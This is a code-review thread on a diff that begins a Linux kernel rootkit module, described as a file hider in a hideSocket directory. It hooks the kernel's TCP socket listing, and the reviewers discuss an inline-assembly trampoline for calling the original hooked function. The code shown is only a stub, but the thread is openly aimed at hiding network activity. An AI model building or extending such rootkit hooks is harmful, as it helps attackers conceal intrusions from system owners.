hideSocket/driver_hideSocket.c

```diff
@@ -0,0 +1,44 @@
+
+#include <linux/init.h>
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/kallsyms.h>
+#include <linux/seq_file.h>
+
+#include "hfiles/hardware.h"
+#include "hfiles/inlHook.h"
+
+// default configuration...
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("dan0xcc");
+MODULE_DESCRIPTION("files hider rootkit driver"); 
+MODULE_VERSION("1.00");
+
+static int my_tcp4_seq_show(struct seq_file *file, void *v)
+{
+
+    printk(KERN_INFO "hooked!\n"); 
```

Comment:
Not calling the original function?

Reply:
The function will stuck in a loop, because it contains the jmp instruction. It means that, you are patching the function only when unloading the module. If you will call the function with the original prolog inside your hook handler, the hook will be released and you won't be able to call your hook again.

Reply:
But you need to call the original function. Do you have an idea how to achieve that?

Reply:
Do you mean when unloading or within the hooking handler?

Reply:
in the hooking handler

Reply:
I made it, and it works but it loops and crashes. But I will figure a way around it

Reply:
Ok I think I solved the problem, tell me if it legit. So since we can write inline assembly in GCC, I thought why not to write some sort of trampoline function which takes the address of the original function and jumps N bytes below this address, so we won't stuck in a loop, and instead arrive to the original function, few bytes below "jmp our_hook". What do you think?